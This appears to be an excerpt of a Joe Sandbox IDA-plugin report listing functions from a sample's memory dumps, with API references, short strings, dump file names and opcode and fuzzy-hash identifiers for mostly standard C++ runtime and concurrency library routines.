Function 0042AE65 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

List.LIBCONCRT ref: 0042AEEA
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042AF0F
Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 0042AF4E

Strings

pExecutionResource, xrefs: 0042AF07

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
String ID: pExecutionResource
API String ID: 1772865662-359481074
Opcode ID: 307fc8553255622f2e41d21d5ca305974523e3bf95507b50fe7deae7cab19e1c
Instruction ID: fa6d3a0e3725f8ef027d180f71de552ac3c936f12b730e52bc2201ef4983df17
Opcode Fuzzy Hash: 307fc8553255622f2e41d21d5ca305974523e3bf95507b50fe7deae7cab19e1c
Instruction Fuzzy Hash: 9A21A9B5B403059BCB04EF55C882BED77A5BF48314F50405FE90167382DB78AE55CB99

Function 02362AB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02362B27
_free.LIBCMT ref: 02362B7D

Part of subcall function 02362959: _free.LIBCMT ref: 023629B1
Part of subcall function 02362959: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00456758), ref: 023629C3

Strings

XgE, xrefs: 02362AE0

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID: XgE
API String ID: 597776487-2984570469
Opcode ID: f87cbb37d26a9294995cc9def7b394ab45dcd78de0b256dadcc3d82326988738
Instruction ID: acfed775718305757e0ddb87e597e2736b5e7889dd72f35a8e575037d5f5ae3f
Opcode Fuzzy Hash: f87cbb37d26a9294995cc9def7b394ab45dcd78de0b256dadcc3d82326988738
Instruction Fuzzy Hash: 7C21267280022A67DB31AA348C4CEFBB77DDB84364F124295DD94B7198EBB04985CEA5

Function 02340EC3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02340F31
Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 02340F3E
Concurrency::details::ResourceManager::ResourceManager.LIBCONCRT ref: 02340F91

Strings

p[F, xrefs: 02340F36

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Resource$AcquireConcurrency::details::Concurrency::details::_H_prolog3Lock::_ManagerManager::Reentrant
String ID: p[F
API String ID: 220083066-1832964472
Opcode ID: 6216d83329a3209df67438af02903c6e9b09d36f54debea953983a2b7a8ea068
Instruction ID: ca605e4a7251328719ab92e4320b9f5515615a8909785bf3e577f3849b7eaeb8
Opcode Fuzzy Hash: 6216d83329a3209df67438af02903c6e9b09d36f54debea953983a2b7a8ea068
Instruction Fuzzy Hash: A601B561B083058EDB2DABB8555035D7BE1AB04740F5005FEE605EB281EF74AA408F99

Function 0042A0EE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0042A102
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0042A126
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042A139

Strings

pScheduler, xrefs: 0042A131

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 246774199-923244539
Opcode ID: 682a3eefa47bedf4d22a1faa156ea6bcc2a49e045c4e2ce76e6417afd79e9783
Instruction ID: 10cbf4c553f32a99b29d21dedcc7eb1d51cf5285ac80ee2cb09dfeade9188058
Opcode Fuzzy Hash: 682a3eefa47bedf4d22a1faa156ea6bcc2a49e045c4e2ce76e6417afd79e9783
Instruction Fuzzy Hash: 56F02B35700224A38720FA55FC428AEF3789F80729BA0812FEC0517182DB7CAA19C69E

Function 0043934C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00439394

Strings

2y, xrefs: 00439386
2y, xrefs: 0043937F

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: _free
String ID: 2y$2y
API String ID: 269201875-3707988291
Opcode ID: daef7b90b13c293795230fa8f4f19d7a1ebdc66eeed14e6a6988e950460efdf7
Instruction ID: 3dbd1e81f1b9f0d2dd20296d5e33d7b3406a8180cf7784a0fc2d3686ee0f72d1
Opcode Fuzzy Hash: daef7b90b13c293795230fa8f4f19d7a1ebdc66eeed14e6a6988e950460efdf7
Instruction Fuzzy Hash: 9BE065A2546A114AE215263B7C4576B16569BCD336F21222FFC24865D0EEFC4C43415F

Function 02340081 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegisterWaitForSingleObject.KERNEL32(?,%C,?,02350C8C,000000FF,0000000C), ref: 02340098
GetLastError.KERNEL32(?,02350C8C,?,00430925,?,?,?,?,?,?,02345F15,?), ref: 023400A7
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 023400BD

Strings

%C, xrefs: 02340094

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastObjectRegisterSingleWait
String ID: %C
API String ID: 2296417588-4291884666
Opcode ID: fbcf708f24b496e530a1d5d1bc838a4ad30d765a2443b3a5aa298535997dd61c
Instruction ID: 7d9c8ad488763ba29b946d3833ff2cd30f23be4cec72f771946d3621e38057c6
Opcode Fuzzy Hash: fbcf708f24b496e530a1d5d1bc838a4ad30d765a2443b3a5aa298535997dd61c
Instruction Fuzzy Hash: 8AF0A03560020AFBCF14EFA5DD44EAE37BDAB00705F200565B624E20D2DB35E6049B64

Function 0041FE1A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegisterWaitForSingleObject.KERNEL32(?,?,00000001,%C,000000FF,0000000C), ref: 0041FE31
GetLastError.KERNEL32(?,00430A25,?,00430925,?,?,?,?,?,?,00425CAE,?), ref: 0041FE40
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041FE56

Strings

%C, xrefs: 0041FE27

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastObjectRegisterSingleWait
String ID: %C
API String ID: 2296417588-3573392825
Opcode ID: fbcf708f24b496e530a1d5d1bc838a4ad30d765a2443b3a5aa298535997dd61c
Instruction ID: 9d603aad05ffa4e056fd93621e3d7a672a7e3166deae781ad298c0678da8b19d
Opcode Fuzzy Hash: fbcf708f24b496e530a1d5d1bc838a4ad30d765a2443b3a5aa298535997dd61c
Instruction Fuzzy Hash: BFF0A73550020AB7CF00EFA1DC45EEF7B6C6B00705F100525B614E11E2DA38E6449768

Function 0233D400 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

RtlLeaveCriticalSection.NTDLL(00465750), ref: 0233D42D
WaitForSingleObjectEx.KERNEL32(00468680,00000000,?,0233D39D,00000064,?,0045007C,?,02327854,00468680), ref: 0233D43E
RtlEnterCriticalSection.NTDLL(00465750), ref: 0233D445

Strings

PWF, xrefs: 0233D427

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeaveObjectSingleWait
String ID: PWF
API String ID: 501323975-4189640852
Opcode ID: 797b37c2cabad88e9ba561759b38bac6fac545db67df0b7ba0c67b1f35825c1a
Instruction ID: f7c886911444a6fb6ddfba04f43ba74d966a7770a62ec4aee345b9c697c7ef94
Opcode Fuzzy Hash: 797b37c2cabad88e9ba561759b38bac6fac545db67df0b7ba0c67b1f35825c1a
Instruction Fuzzy Hash: 87E01235641B28F7C7021B50EC09A9E3F68EB45763F044031FA0566561DB656D40CBDF

Function 02327F97 Relevance: 6.4, APIs: 4, Instructions: 422libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,00462014), ref: 02328011
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02328072
GetProcAddress.KERNEL32(00000000), ref: 02328079
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0232813E

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: AddressHandleInfoModuleProcSystemVersion
String ID:
API String ID: 1456109104-0
Opcode ID: f86739a690633f7d14615720dab4f5b7d6e0e144a36365c4640fb5ca6efcc30f
Instruction ID: 0c0dde32eda43fc905a0fb88b4fe83a4fb9c9a6805c9c60382c1fb1ab7d2f64b
Opcode Fuzzy Hash: f86739a690633f7d14615720dab4f5b7d6e0e144a36365c4640fb5ca6efcc30f
Instruction Fuzzy Hash: D1E107B0E00264ABDB28BB68CD4679C7B72AB41714F94429CD415673C1EB754F888FD3

Function 0235CE46 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0235CECD

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: d1e2580fea8bb5659ef3a0ec9f2bd8d3f247a712cc4476731abb6eb94a7ef4ee
Instruction ID: 33dcfac380d618aa5a6111df22c3b6eb4cf9bcfb0609a43746a2f44dbef057e4
Opcode Fuzzy Hash: d1e2580fea8bb5659ef3a0ec9f2bd8d3f247a712cc4476731abb6eb94a7ef4ee
Instruction Fuzzy Hash: 73B118329002A99FDB21CF28C881FBEBBF6EF45344F14856ADC599B341D7358A42CB60

Function 023552B5 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0235537C
___AdjustPointer.LIBCMT ref: 0235539F
___AdjustPointer.LIBCMT ref: 0235543B

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: ee1216290e05d5aa883e1d856bebe084c5c42d67d7e9ed6b593ecc55b417bb7c
Instruction ID: cca8fb9d88689cfd5fa9f647cfff59987e0b6527304bdff63b04291a3bf3039d
Opcode Fuzzy Hash: ee1216290e05d5aa883e1d856bebe084c5c42d67d7e9ed6b593ecc55b417bb7c
Instruction Fuzzy Hash: 1D51C072601626EFDB298F50D880F7A77A5EF04315F94452DEC0E5B6A0E7B1F980CB90

Function 0043504E Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00435115
___AdjustPointer.LIBCMT ref: 00435138
___AdjustPointer.LIBCMT ref: 004351D4

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 24256a6a0eee4dc051d6a34bfd34133c294509d047b55e93e8e20eb2f16a28ea
Instruction ID: de7e3e00fb04a34b96eeb7253be455e546d1f1f5c91bb76df3f696651397a324
Opcode Fuzzy Hash: 24256a6a0eee4dc051d6a34bfd34133c294509d047b55e93e8e20eb2f16a28ea
Instruction Fuzzy Hash: 5851E171A01A06AFEF289F55D841BBB73B4EF18304F14516FE80197291E739ED41CB99

Function 023285E7 Relevance: 6.2, APIs: 4, Instructions: 155libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,?,00462014), ref: 02328660
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 023286C7
GetProcAddress.KERNEL32(00000000), ref: 023286CE

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID:
API String ID: 3310240892-0
Opcode ID: a9352ec7e219f5b0e6875a96d9916c0a74e731d0ff9642be5bb7f7817e9f41d6
Instruction ID: dad8fff1be63efbc45240727e941e74f571ab128732d24ac65715069193b998e
Opcode Fuzzy Hash: a9352ec7e219f5b0e6875a96d9916c0a74e731d0ff9642be5bb7f7817e9f41d6
Instruction Fuzzy Hash: 5C512970D102289BDB24DF28CD897DDB775EF45710F5042A8E808A72C1EB359B88CFA1

Function 00408380 Relevance: 6.2, APIs: 4, Instructions: 155libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,?,53A352EA), ref: 004083F9
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408460
GetProcAddress.KERNEL32(00000000), ref: 00408467

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID:
API String ID: 3310240892-0
Opcode ID: c5af24d2983aef2b3c383eb558275b6883f436ff97da18ae2b794e3607aa909b
Instruction ID: 938ad35630e66277154cddf74743d86f98c067e6d70a9bb90e20810804f89ef8
Opcode Fuzzy Hash: c5af24d2983aef2b3c383eb558275b6883f436ff97da18ae2b794e3607aa909b
Instruction Fuzzy Hash: E9510870D00214ABDB14EF68DE497DEBB74EB46314F5042BEE445A72C1EF389AC48B99

Function 02354E7C Relevance: 6.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

TypeidsEqual.LIBVCRUNTIME ref: 02354ECD
TypeidsEqual.LIBVCRUNTIME ref: 02354EF2
PMDtoOffset.LIBCMT ref: 02354F08
PMDtoOffset.LIBCMT ref: 02354F89

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: EqualOffsetTypeids
String ID:
API String ID: 1707706676-0
Opcode ID: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
Instruction ID: 942da17368923835c30d33fca960e8b5aba8cee9ac50f9ed231e162706263f1b
Opcode Fuzzy Hash: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
Instruction Fuzzy Hash: 4D519C3590432A9FCF29CF69C480AEEBBF5EF05214F15449AED58A7351D732A984CB90

Function 00434C15 Relevance: 6.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

TypeidsEqual.LIBVCRUNTIME ref: 00434C66
TypeidsEqual.LIBVCRUNTIME ref: 00434C8B
PMDtoOffset.LIBCMT ref: 00434CA1
PMDtoOffset.LIBCMT ref: 00434D22

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: EqualOffsetTypeids
String ID:
API String ID: 1707706676-0
Opcode ID: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
Instruction ID: cef6b095d55e150eee694991f596d606281b118854b35fc2e5d75d5fbf24ef20
Opcode Fuzzy Hash: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
Instruction Fuzzy Hash: C851BC35A042099FDF10CFA8C4806EEBBF4EF89354F14649BE850A7361D33ABA05CB54

Function 02366235 Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02366305
_free.LIBCMT ref: 0236632E
SetEndOfFile.KERNEL32(00000000,02361C71,00000000,0235AEF9,?,?,?,?,?,?,?,02361C71,0235AEF9,00000000), ref: 02366360
GetLastError.KERNEL32(?,?,?,?,?,?,?,02361C71,0235AEF9,00000000,?,?,?,?,00000000), ref: 0236637C

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 6fb0f9e19d4acd712ab8c7b746a97e06f48a18ddc77e8d7a73dfb4aa9b2b61d0
Instruction ID: af9033d49da1e9545984c36ad1101c9a49eaa6b13c3ecb4a7450f03f2fbfa65f
Opcode Fuzzy Hash: 6fb0f9e19d4acd712ab8c7b746a97e06f48a18ddc77e8d7a73dfb4aa9b2b61d0
Instruction Fuzzy Hash: 3A41D932900615ABDB316FB8CC4AFBE777EAF453A4F285514E828A71A4E73CC4448F61

Function 02323127 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 023231C6
GetCurrentThreadId.KERNEL32 ref: 023231E5
__Mtx_unlock.LIBCPMT ref: 02323233
__Cnd_broadcast.LIBCPMT ref: 0232324A

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcastCurrentThread
String ID:
API String ID: 3264154886-0
Opcode ID: d95c55a17dc6c0951bf91651ac23ff9b82cafa9506b18cb5ad1f8234279d2599
Instruction ID: 8008b8d3ee29a6250145df7a15b3221d186ab3f702f2c9eda5a1343bf99540e5
Opcode Fuzzy Hash: d95c55a17dc6c0951bf91651ac23ff9b82cafa9506b18cb5ad1f8234279d2599
Instruction Fuzzy Hash: CD41DFB1A007259BDB22EF64C944B5AB7F9FF05324F10496ED815E7740EB39E609CB81

Function 00402EC0 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00402F5F
GetCurrentThreadId.KERNEL32 ref: 00402F7E
__Mtx_unlock.LIBCPMT ref: 00402FCC
__Cnd_broadcast.LIBCPMT ref: 00402FE3

Part of subcall function 0041C6AC: mtx_do_lock.LIBCPMT ref: 0041C6B4

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcastCurrentThreadmtx_do_lock
String ID:
API String ID: 3471820992-0
Opcode ID: f0f8b121aba1122f24a75a8c83bd5bf134d72cfcefe3452c2b67ebb99ce96ba3
Instruction ID: 48187f3e1bc168490bb81d7fc303c9f02b2004bad0fbdb5a3eb1e4516cac7e92
Opcode Fuzzy Hash: f0f8b121aba1122f24a75a8c83bd5bf134d72cfcefe3452c2b67ebb99ce96ba3
Instruction Fuzzy Hash: 2141CFB0A016159BDB20DF65C98579BB7E8FF14364F00453EE816E7380EB79EA04CB85

Function 00445FCE Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0044609E
_free.LIBCMT ref: 004460C7
SetEndOfFile.KERNEL32(00000000,00441A0A,00000000,0043AC92,?,?,?,?,?,?,?,00441A0A,0043AC92,00000000), ref: 004460F9
GetLastError.KERNEL32(?,?,?,?,?,?,?,00441A0A,0043AC92,00000000,?,?,?,?,00000000), ref: 00446115

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 6fb0f9e19d4acd712ab8c7b746a97e06f48a18ddc77e8d7a73dfb4aa9b2b61d0
Instruction ID: f61cd90cd7361cc84673696b1269d2078ce9a605f9326b768ff18fa508e212cc
Opcode Fuzzy Hash: 6fb0f9e19d4acd712ab8c7b746a97e06f48a18ddc77e8d7a73dfb4aa9b2b61d0
Instruction Fuzzy Hash: 6041F872900601ABFB25ABA9CD02B9E37B5EF4A364F15011BF914E7292D63CD841472A

Function 02351D90 Relevance: 6.1, APIs: 4, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 02351DA9

Part of subcall function 02352078: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,02351AF1), ref: 02352088

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 02351DBE
std::invalid_argument::invalid_argument.LIBCONCRT ref: 02351DCD
std::invalid_argument::invalid_argument.LIBCONCRT ref: 02351E91

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::std::invalid_argument::invalid_argument$ExecutionFreeIdleObjectProcessorProxy::ResetRoot::SingleSuspendThreadVirtualWait
String ID:
API String ID: 1312548968-0
Opcode ID: 84332b62cc3de3cfa4170185330e29230a9dc1dcd046b531a1b7116e20220df0
Instruction ID: 02c3ede3c6ab32f4008a84914429eaa15bc257c8596005dbc02067ca6858ccbc
Opcode Fuzzy Hash: 84332b62cc3de3cfa4170185330e29230a9dc1dcd046b531a1b7116e20220df0
Instruction Fuzzy Hash: 6B31D836A00224ABCF15EF68C884F6D73B9BF44714F20456AED5DA7242DB74EE05CB94

Function 02342F63 Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 02342F76

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: BuffersConcurrency::details::InitializeManager::Resource
String ID:
API String ID: 3433162309-0
Opcode ID: 22ca41de25d3fddfd321250d59b84d7d3dba6f78c4a0763dc9e7bbb86f5d08b7
Instruction ID: 2d413b42904d67544abcfbdfd3c2395536e7814c4d5857486271d7f840934b6f
Opcode Fuzzy Hash: 22ca41de25d3fddfd321250d59b84d7d3dba6f78c4a0763dc9e7bbb86f5d08b7
Instruction Fuzzy Hash: 84310775A00309EFCF20DF54C4C0BAE7BF9AB44754F1405EAD946AB246DB31BA45CBA1

Function 00422CFC Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00422D0F

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: BuffersConcurrency::details::InitializeManager::Resource
String ID:
API String ID: 3433162309-0
Opcode ID: 22ca41de25d3fddfd321250d59b84d7d3dba6f78c4a0763dc9e7bbb86f5d08b7
Instruction ID: d418521b68a385beeb000fecb389156560c70f9a2eedc7cbe4bb4063ba4b2acd
Opcode Fuzzy Hash: 22ca41de25d3fddfd321250d59b84d7d3dba6f78c4a0763dc9e7bbb86f5d08b7
Instruction Fuzzy Hash: 56318835A00319EFCF10DF94DA80BAE7BB9BF44304F5000AAD901AB346D7B4A905CBA5

Function 0235DBB6 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 02356C33: _free.LIBCMT ref: 02356C41

Part of subcall function 0235EB8D: WideCharToMultiByte.KERNEL32(02328A07,00000000,0045FB20,00000000,02328A07,02328A07,023608B7,?,0045FB20,?,00000000,?,02360626,0000FDE9,00000000,?), ref: 0235EC2F

GetLastError.KERNEL32 ref: 0235DC1E
__dosmaperr.LIBCMT ref: 0235DC25
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0235DC64
__dosmaperr.LIBCMT ref: 0235DC6B

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

